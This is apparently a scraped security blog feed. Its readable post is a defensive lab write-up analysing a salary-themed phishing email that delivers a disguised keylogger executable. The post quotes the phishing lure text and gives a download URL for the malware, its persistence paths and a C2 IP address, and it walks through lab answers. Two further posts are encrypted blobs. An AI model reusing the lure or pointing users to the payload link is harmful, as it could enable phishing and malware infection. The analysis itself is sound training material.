a(k.toString(CryptoJS.enc.Utf8),f)}catch(l){return!1}};document.addEventListener('DOMContentLoaded',function(){var b=document.getElementById('pec-decrypt-content'),c=document.getElementById('pec-content-password'),d=document.getElementById('pec-encrypted-content'),f=document.getElementById('pec-decrypted-content'),g=document.getElementById('pec-decrypt-form'),h=function(a){var h=d.innerHTML.split(';'),i=e(c.value,h[0],h[1],h[2]);i?(f.innerHTML=i,g.parentNode.removeChild(g),d.parentNode.removeChild(d)):(c.value=''),a.preventDefault();return!1};b.addEventListener('click',h);g.addEventListener('submit',h)})})(); </script>2022-03-18T17:09:47-04:002022-03-18T17:09:47-04:00Eric Turnertag:blog.ericturner.it,2022-03-18:/2022/03/18/btlo-investigation-ben/

<p>Link: <a href="https://blueteamlabs.online/home/investigation/96">https://blueteamlabs.online/home/investigation/96</a></p> <blockquote> <p>Ben was working very hard at FaanG industries to get a maximum percentage of the hike. He was talking about this with his HR as well. While he was preparing for a Salary Negotiation meeting, Ben received a phishing email and an attachment …</p></blockquote>

<p>Link: <a href="https://blueteamlabs.online/home/investigation/96">https://blueteamlabs.online/home/investigation/96</a></p> <blockquote> <p>Ben was working very hard at FaanG industries to get a maximum percentage of the hike. He was talking about this with his HR as well. While he was preparing for a Salary Negotiation meeting, Ben received a phishing email and an attachment explaining to him a New Salary Negotiation process at the company. This resulted in the theft of the super-secret Database credentials of Ben. Necessary remediation steps were taken to reduce the damage. CISO advised the security team to study Ben&rsquo;s case, analyze the Evidence and prepare an Awareness workshop with technical details of the attack. Evidence and the necessary analysis tools were placed on the Desktop. Note: If prompted for Admin Privileges choose BTLOPlayer account.</p> <p>Scenario</p> </blockquote> <p>Using Kernel EML Viewer, I navigated to \Desktop\CollectedEvidence to view the email that Ben received. We can see the subject of Salary Renegotiations (Q1), and the from/to emails of HR_Engineer@faang.com, Ben_Engineer@faang.com (Q2). The body of the email was base64 encoded; Using the provided Cyberchef webapp, it decodes as follows:</p> <div class="highlight"><pre><span></span><code><span class="n">Dear</span><span class="w"> </span><span class="n">Ben</span><span class="p">,</span> <span class="n">The</span><span class="w"> </span><span class="n">Department</span><span class="w"> </span><span class="n">of</span><span class="w"> </span><span class="n">Human</span><span class="w"> </span><span class="n">Resources</span><span class="w"> </span><span class="n">has</span><span class="w"> </span><span class="n">amended</span><span class="w"> </span><span class="n">the</span><span class="w"> </span><span class="n">salary</span><span class="w"> </span><span class="n">renegotiation</span><span class="w"> </span><span class="n">process</span><span class="p">.</span><span class="w"> </span><span class="n">In</span><span class="w"> </span><span class="n">order</span><span class="w"> </span><span class="n">to</span><span class="w"> </span><span class="n">qualify</span><span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="n">a</span><span class="w"> </span><span class="n">pay</span><span class="w"> </span><span class="n">raise</span><span class="p">,</span><span class="w"> </span><span class="n">all</span><span class="w"> </span><span class="n">interested</span><span class="w"> </span><span class="n">employees</span><span class="p">,</span><span class="w"> </span><span class="n">must</span><span class="w"> </span><span class="n">schedule</span><span class="w"> </span><span class="n">a</span><span class="w"> </span><span class="n">one</span><span class="o">-</span><span class="n">on</span><span class="o">-</span><span class="n">one</span><span class="w"> </span><span class="n">meeting</span><span class="w"> </span><span class="n">with</span><span class="w"> </span><span class="n">a</span><span class="w"> </span><span class="n">member</span><span class="w"> </span><span class="n">of</span><span class="w"> </span><span class="n">the</span><span class="w"> </span><span class="n">HR</span><span class="w"> </span><span class="n">staff</span><span class="p">.</span><span class="w"> </span><span class="n">The</span><span class="w"> </span><span class="n">particular</span><span class="w"> </span><span class="n">HR</span><span class="w"> </span><span class="n">salary</span><span class="w"> </span><span class="n">staff</span><span class="w"> </span><span class="n">member</span><span class="w"> </span><span class="n">assigned</span><span class="w"> </span><span class="n">to</span><span class="w"> </span><span class="n">work</span><span class="w"> </span><span class="n">with</span><span class="w"> </span><span class="n">you</span><span class="w"> </span><span class="n">on</span><span class="w"> </span><span class="n">salary</span><span class="w"> </span><span class="n">negotiations</span><span class="w"> </span><span class="n">will</span><span class="w"> </span><span class="n">email</span><span class="w"> </span><span class="n">you</span><span class="w"> </span><span class="n">separately</span><span class="p">.</span> <span class="n">Prior</span><span class="w"> </span><span class="n">to</span><span class="w"> </span><span class="n">scheduling</span><span class="w"> </span><span class="n">a</span><span class="w"> </span><span class="n">meeting</span><span class="w"> </span><span class="n">with</span><span class="w"> </span><span class="n">your</span><span class="w"> </span><span class="n">HR</span><span class="w"> </span><span class="n">liaison</span><span class="p">,</span><span class="w"> </span><span class="n">please</span><span class="w"> </span><span class="n">review</span><span class="w"> </span><span class="n">the</span><span class="w"> </span><span class="n">attached</span><span class="w"> </span><span class="n">PDF</span><span class="w"> </span><span class="n">document</span><span class="w"> </span><span class="n">outlining</span><span class="w"> </span><span class="n">the</span><span class="w"> </span><span class="n">new</span><span class="w"> </span><span class="n">salary</span><span class="w"> </span><span class="n">renegotiation</span><span class="w"> </span><span class="n">process</span><span class="p">.</span><span class="w"> </span><span class="n">Failure</span><span class="w"> </span><span class="n">to</span><span class="w"> </span><span class="n">review</span><span class="w"> </span><span class="n">the</span><span class="w"> </span><span class="n">file</span><span class="w"> </span><span class="n">will</span><span class="w"> </span><span class="n">disqualify</span><span class="w"> </span><span class="n">you</span><span class="w"> </span><span class="n">from</span><span class="w"> </span><span class="n">petitioning</span><span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="n">a</span><span class="w"> </span><span class="n">pay</span><span class="w"> </span><span class="n">raise</span><span class="w"> </span><span class="n">this</span><span class="w"> </span><span class="n">quarter</span><span class="p">.</span> <span class="n">Thank</span><span class="w"> </span><span class="n">you</span><span class="p">,</span><span class="w"> </span> <span class="n">HR</span> <span class="o">===</span> <span class="p">[</span><span class="mh">1</span><span class="p">]</span><span class="o">:</span><span class="w"> </span><span class="n">Know</span><span class="w"> </span><span class="n">the</span><span class="w"> </span><span class="n">New</span><span class="w"> </span><span class="n">Salary</span><span class="w"> </span><span class="n">Negotiation</span><span class="w"> </span><span class="n">Process</span><span class="p">.</span><span class="n">pdf</span> </code></pre></div> <p>Based on the fact the email came from an internal email that appears legitimate, in the correct format, with language specifically targeted to Ben, knowing he was preparing for a salary negotiation meeting is an extraordinarily advanced phishing scheme. I honestly don't fully blame Ben for clicking and downloading the attachment due to these circumstances.</p> <p>But now once we actually open the PDF, it becomes immediately apparent something seems wrong. The presentation of the PDF is horrible, and does not appear to automatically run anything so he must have clicked the link manually. The download button directs you to this link (Q3, Q4): https://www.dropbox.com/s/3dqft1ays1ltgrg/NewSalaryNegotiation.uue?dl=1</p> <p>Unzipping this contains a SalaryNegotiationProcess.pdf.exe. It's a clever naming scheme and uses the icon of an actual PDF document while clicking it will run an executable.</p> <p>I started up Noriben with <code>.\Noriben.py</code> and it is ready for us to double-click the exe. I did some research online, because I had never used Noriben before, and it was recommended to let Noriben/Procmon run for about 4 minutes before killing it. Also because the Note on the desktop mentioned a keylogger was installed, I was typing in the notepad window in case the keylogger maybe drops files of what was logged.</p> <p>Using CTRL+C, I stopped the log.</p> <p>At the top of our File Activity portion of the log is the following:</p> <div class="highlight"><pre><span></span><code><span class="o">[</span>CreateFile<span class="o">]</span><span class="w"> </span>SalaryNegotiationProcess.pdf.exe:1316<span class="w"> </span>&gt;<span class="w"> </span>%LocalAppData%<span class="se">\M</span>icrosoft<span class="se">\W</span>indows<span class="se">\H</span>istory<span class="se">\s</span>alaryhike<span class="se">\e</span>xplorer.exe <span class="o">[</span>CreateFile<span class="o">]</span><span class="w"> </span>explorer.exe:4940<span class="w"> </span>&gt;<span class="w"> </span>%AppData%<span class="se">\M</span>icrosoft<span class="se">\W</span>indows<span class="se">\S</span>tart<span class="w"> </span>Menu<span class="se">\P</span>rograms<span class="se">\S</span>tartup<span class="se">\M</span>icrosoft<span class="w"> </span>Corporation.exe </code></pre></div> <p><code>T</code>hese exe files are the copies for persistence (Q6). I also noticed <code>%LocalAppData%\Microsoft\Windows\History\salaryhike\explorer.exe.tmp</code>. being used right after the <code>Microsoft Corporation.exe</code> several times as seen here:</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2022/03/image-10.webp"/></p> <p>explorer.exe.tmp file</p> <p>This indicates it is probably the keylogger file (Q7). I tried accessing the file but it isn't shown on disk.</p> <p>By pulling up <code>netstat</code> we can see 107.189.29.181:5005 in the SYN_SENT appear (Q8). It doesn't always appear but I ran a few times and got it to show up. It must be exfiltrating the data from the tmp quick enough that you can't see it on the machine.</p> <p>The last question we have available is to submit the mutex. The issue is our machine does not have internet connection, so we cannot download tools like ProcessExplorer or use SysInternals or <code>strings</code>. I decided to load the file into Cyberchef and just read through the output. I tried strings on here, but still saw nothing.</p> <p>By manually reading through, you can see what looks like text followed by a period after every character such as <code>W.a.i.t.F.o.r.E.x.i.t</code>, which is why <code>strings</code> failed to (Q5) pick up. Because a mutex is basically a lock on a file, shortly after the wait for exit text is the mutex in curly braces:</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2022/03/image-11.webp"/></p> <h1 id="conclusion">Conclusion</h1> <p>This box was actually fairly challenging for me, particularly Q5 and Q8 as they did not rely solely on Noriben and required some out of the box thinking in order to find them. But I definitely felt I learned a lot and added some new tools under my blue team toolbelt!</p>2022-03-17T13:55:13-04:002022-03-17T13:55:13-04:00Eric Turnertag:blog.ericturner.it,2022-03-17:/2022/03/17/btlo-investigation-rdp/

This investigation is currently active on Blue Team Labs Online, thus is required to be password protected. You will need to wait until the investigation is retired for the full solution. In special circumstances, you may email me for the password.

<div id="pec-encrypted-content" style="display:none">DakRtWfqXwcySXM/jp3lMw==;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;^</div> <div id="pec-decrypted-content"> <h4><i>This investigation is currently active on Blue Team Labs Online, thus is required to be password protected. You will need to wait until the investigation is retired for the full solution. In special circumstances, you may email me for the password.</i></h4> </div> <form id="pec-decrypt-form"> <label for="pec-content-password">Password</label> <input type="password" id="pec-content-password" placeholder="Password" /> <button type="button" id="pec-decrypt-content">Decrypt</button> </form> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/core.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/enc-base64.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/cipher-core.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/pad-nopadding.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/md5.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/aes.js"></script> <script type="text/javascript"> (function(){var a=function(b,c){for(var d=b.length;d>0;d--)if(b[d-1]!==c)return b.slice(0,d)},e=function(b,c,d,f){var g=CryptoJS.MD5(b),h=CryptoJS.enc.Base64.parse(c),i=CryptoJS.enc.Base64.parse(d),j={key:g,iv:h,ciphertext:i},k=CryptoJS.AES.decrypt(j,g,{iv:h,padding:CryptoJS.pad.NoPadding});try{return a(k.toString(CryptoJS.enc.Utf8),f)}catch(l){return!1}};document.addEventListener('DOMContentLoaded',function(){var b=document.getElementById('pec-decrypt-content'),c=document.getElementById('pec-content-password'),d=document.getElementById('pec-encrypted-content'),f=document.getElementById('pec-decrypted-content'),g=document.getElementById('pec-decrypt-form'),h=function(a){var h=d.innerHTML.split(';'),i=e(c.value,h[0],h[1],h[2]);i?(f.innerHTML=i,g.parentNode.removeChild(g),d.parentNode.removeChild(d)):(c.value=''),a.preventDefault();return!1};b.addEventListener('click',h);g.addEventListener('submit',h)})})(); </script>2022-03-16T14:26:25-04:002022-03-16T14:26:25-04:00Eric Turnertag:blog.ericturner.it,2022-03-16:/2022/03/16/btlo-investigation-deep-blue/

This investigation is currently active on Blue Team Labs Online, thus is required to be password protected. You can unlock this challenge by using the last password requested, or wait until the investigation is retired.

<div id="pec-encrypted-content" style="display:none">7xibgpzdrVJOxqNxrJULMA==;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